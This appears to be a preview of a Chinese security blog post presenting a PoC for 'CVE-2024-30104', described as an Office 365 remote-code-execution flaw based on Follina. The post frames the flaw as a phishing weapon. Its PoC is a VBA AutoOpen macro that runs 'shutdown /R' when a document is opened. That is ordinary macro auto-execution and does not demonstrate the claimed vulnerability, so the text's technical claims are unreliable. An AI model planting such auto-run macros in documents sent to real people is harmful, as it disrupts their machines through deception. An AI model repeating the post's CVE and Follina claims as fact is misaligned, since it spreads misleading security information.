CVE-2024-30104：Office 365 RCE【PoC】

文章预览

声明： 文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由用户承担全部法律及连带责任，文章作者不承担任何法律及连带责任。 博客新域名： https://gugesay.com 不想错过任何消息？设置星标 ↓ ↓ ↓ 漏洞简述 问题仍出在 "docx "文件上，该漏洞基于 Follina 的0day漏洞,依然是利用的宏脚本实现的RCE操作。视频演示中，可以看到：用户如何被诱骗打开攻击者发送给他们的恶意文件，执行该文件后，对在执行该文件的“受害者”来说，情况将非常糟糕（视频演示为“强制用户的 Windows 操作系统关闭”） 可以说利用该漏洞进行“钓鱼”攻击，将是一大利器！ PoC Sub AutoOpen() Dim Program As String Dim TaskID As Double On Error Resume Next Program = "shutdown /R" TaskID = Shell(Program, 1) If Err < > 0 Then MsgBox "Can't start " & Program End If End Sub ………………………………